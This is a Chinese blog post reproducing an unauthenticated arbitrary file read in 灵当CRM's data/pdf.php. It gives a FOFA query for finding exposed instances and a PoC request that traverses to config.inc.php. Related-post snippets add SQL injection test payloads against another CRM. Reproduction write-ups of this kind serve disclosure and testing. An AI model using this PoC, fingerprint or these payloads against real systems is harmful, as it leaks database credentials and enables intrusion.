灵当CRM data pdf.php 任意文件读取漏洞复现

灵当CRM任意文件读取漏洞复现
最新推荐文章于 2025-11-27 11:57:21 发布
原创 最新推荐文章于 2025-11-27 11:57:21 发布 · 375 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #漏洞复现

0x01 产品简介

灵当CRM是一款专为中小企业打造的智能客户关系管理工具,由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,灵当CRM都能提供全面、高效的解决方案。

0x02 漏洞概述

灵当CRM data/pdf.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

0x04 漏洞复现

PoC

GET /crm/data/pdf.php?url=../config.inc.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
CRM data/pdf.php 任意文件读取漏洞复现
0xSec
10-13 1608
CRM data/pdf.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CRM index.php SQL注入漏洞复现
iSee857的博客
09-20 1079
CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。CRM客户管理系统index.php 中参数没有预编译形式导致sql注入产生。参数使用预编译形式用以对sql注入防护,同时限制接口参数输入。
漏洞复现CRM multipleUpload.php接口处存在文件上传漏洞
qq_48368964的博客
09-27 1474
CRM系统接口multipleUpload.php文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长!在mulipleUpload.php 接口处执行命令上传文件到目标服务器。根据ip拼接上传路径地址进行访问。
CRM multipleUpload.php 文件上传致RCE漏洞复现
iSee857的博客
09-23 929
CRM提供了一系列解决方案,支持新客户开拓、老客户维护、销售过程管理和服务管理等多方面的功能。同时,该系统也注重客户的持续互动与反馈,提升客户忠诚度。该系统广泛应用于多个行业,包括金融、教育、医疗、IT服务及房地产等领域,旨在满足企业对客户个性化管理的需求,从而增强市场竞争力。CRM mulipleUpload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。根据ip拼接上传路径地址进行访问。
crm pdf.php存在任意文件读取漏洞
缘梦未来的博客
12-14 492
CRM是一款专为中小企业打造的智能客户关系管理工具,由上海当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,CRM都能提供全面、高效的解决方案。
漏洞复现CRM datapdf.php 任意文件读取漏洞
m0_71944965的博客
12-25 382
CRM data/pdf.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
昂捷CRM cwsuploadpicture.asmx 任意文件读取漏洞复现
0xSec
12-17 631
​昂捷CRM cwsuploadpicture.asmx 接口GetPicture实例处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CRM pdf.php 任意文件读取漏洞复现
iSee857的博客
10-17 872
CRM提供了一系列解决方案,支持新客户开拓、老客户维护、销售过程管理和服务管理等多方面的功能。该系统广泛应用于多个行业,包括金融、教育、医疗、IT服务及房地产等领域,旨在满足企业对客户个性化管理的需求,从而增强市场竞争力。CRM data/pdf php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。对用户提交的文件路径进行有效的验证和过滤,防止恶意文件路径被提交。
昂捷CRM cwsfiledown.asmx 任意文件读取漏洞复现
0xSec
11-27 642
昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CRM系统接口getMyAmbassador存在SQL注入漏洞
西米安全
12-30 386
CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
漏洞挖掘---CRM客户管理系统getOrderList SQL注入漏洞
m0_66808441的博客
03-30 421
CRM是上海当信息科技有限公司旗下产品,适用于中小型企业。它功能丰富,涵盖销售、服务、财务等管理功能,具有性价比高、简洁易用、可定制、部署活等特点,能助力企业提升经营效益和客户满意度。
浙大恩特CRM Quotegask_editAction SQL注入漏洞复现
iSee857的博客
10-22 641
浙大恩特CRM /Quotegask_editAction 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。Fofa:title="欢迎使用浙大恩特客户资源管理系统" || body="script/Ent.base.js" || app="浙大恩特客户资源管理系统"同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。
漏洞复现】蓝网科技临床浏览系统-SQL注入-cloudInterface(CVE-2024-4653)
知黑而守白
07-10 374
蓝网科技临床浏览系统是一款由蓝网科技开发的临床医学信息管理系统,旨在为医疗机构提供全面的临床信息管理解决方案。该系统集成了临床数据管理、患者信息管理、医疗记录浏览等功能,帮助医生和医务人员更高效地管理和浏览临床数据,提高医疗服务的质量和效率。蓝网科技临床浏览系统cloudInterface接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞
nnn2188185的博客
09-19 361
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发智能AC管理系统HTTPD-AC 1.0服务。
CRM pdf.php接口处存在任意文件读取漏洞 附POC
nnn2188185的博客
10-15 166
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案。
上海普华PowerPMS系统 APPGetUser接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-06 634
上海普华PowerPMS系统 APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。
PHP在微服务中的配置中心
2509_93947720的博客
11-26 389
在微服务架构里,配置中心相当于所有服务的"指挥中心",把散落在各处的配置项统一收拢管理。而配置中心能让所有服务实时获取最新配置,就像给每个服务装了遥控器,改个参数值都不用重启服务。毕竟PHP天生适合快速迭代,加上配置中心的动态配置能力,简直是为业务频繁变动的场景量身定制的。不过要提醒的是,配置项命名必须规范。我们初期踩过坑,不同团队用不同的命名风格,有的用驼峰有的用下划线,查找配置时特别混乱。说到具体实践,我们团队现在把配置分为三类:静态配置写在代码里,环境配置交给配置中心,动态配置通过管理界面实时调整。
MySQL 教程(超详细,零基础可学、第一篇)
最新发布
2509_94101649的博客
11-27 174
MySQL 是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了活性。MySQL 是开源的,目前隶属于 Oracle 旗下产品。MySQL 支持大型的数据库。可以处理拥有上千万条记录的大型数据库。MySQL 使用标准的 SQL 数据语言形式。MySQL 可以运行于多个系统上,并且支持多种语言。
6.Nginx服务器
2301_77138478的博客
11-26 381
摘要:本文介绍了Nginx服务器的安装与配置方法,重点讲解了虚拟主机和SSL/TLS配置。主要内容包括:1) 通过yum安装Nginx并启动服务;2) 基于名称和端口的虚拟主机配置,实现多站点服务;3) 使用OpenSSL生成自签名证书,配置HTTPS站点;4) 设置HTTP到HTTPS的重定向。文中提供了详细的命令操作和测试步骤,并配有配置截图和测试结果展示,帮助用户快速掌握Nginx的基本配置方法。
畅捷通CRM newleadset.php 存在SQL注入的漏洞复现
10-21
复现畅捷通CRM newleadset.php SQL注入漏洞一般可按以下思路进行: #### 环境准备 - 搭建畅捷通CRM系统环境,确保系统版本存在该漏洞。 - 准备好测试工具,如Burp Suite,它可以拦截和修改HTTP请求,方便进行注入测试。 #### 漏洞探测 - 打开Burp Suite,开启代理,配置浏览器使用该代理。 - 访问畅捷通CRM系统中涉及newleadset.php的相关页面,在页面上进行正常的操作,如提交表单等,Burp Suite会拦截到相关的HTTP请求。 - 找到包含newleadset.php的请求,将其发送到Repeater模块。 #### 注入测试 - 在Repeater模块中,对请求中的参数进行注入测试。常见的注入方式有布尔盲注、时间盲注等。 - **布尔盲注**:通过构造SQL语句,根据返回页面的不同来判断条件是否成立。例如,在参数后面添加 `' AND 1=1 --` 和 `' AND 1=2 --`,如果返回页面不同,则说明可能存在注入漏洞。示例请求如下: ``` http://example.com/newleadset.php?param=value' AND 1=1 -- ``` - **时间盲注**:利用 `SLEEP()` 函数来判断注入是否成功。构造类似 `' AND SLEEP(5) --` 的语句,如果页面响应时间明显增加了5秒左右,则说明存在注入漏洞。示例请求如下: ``` http://example.com/newleadset.php?param=value' AND SLEEP(5) -- ``` #### 数据获取 - 如果确认存在注入漏洞,可以进一步构造SQL语句来获取数据库信息。例如,获取数据库名、表名、列名和数据等。 - 获取数据库名: ``` http://example.com/newleadset.php?param=value' AND (SELECT COUNT(*) FROM information_schema.schemata)=5 -- ``` - 获取表名: ``` http://example.com/newleadset.php?param=value' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='database_name')=10 -- ``` 需要注意的是,在进行漏洞复现测试时,必须在合法的授权环境下进行,未经授权对他人系统进行测试是违法的行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值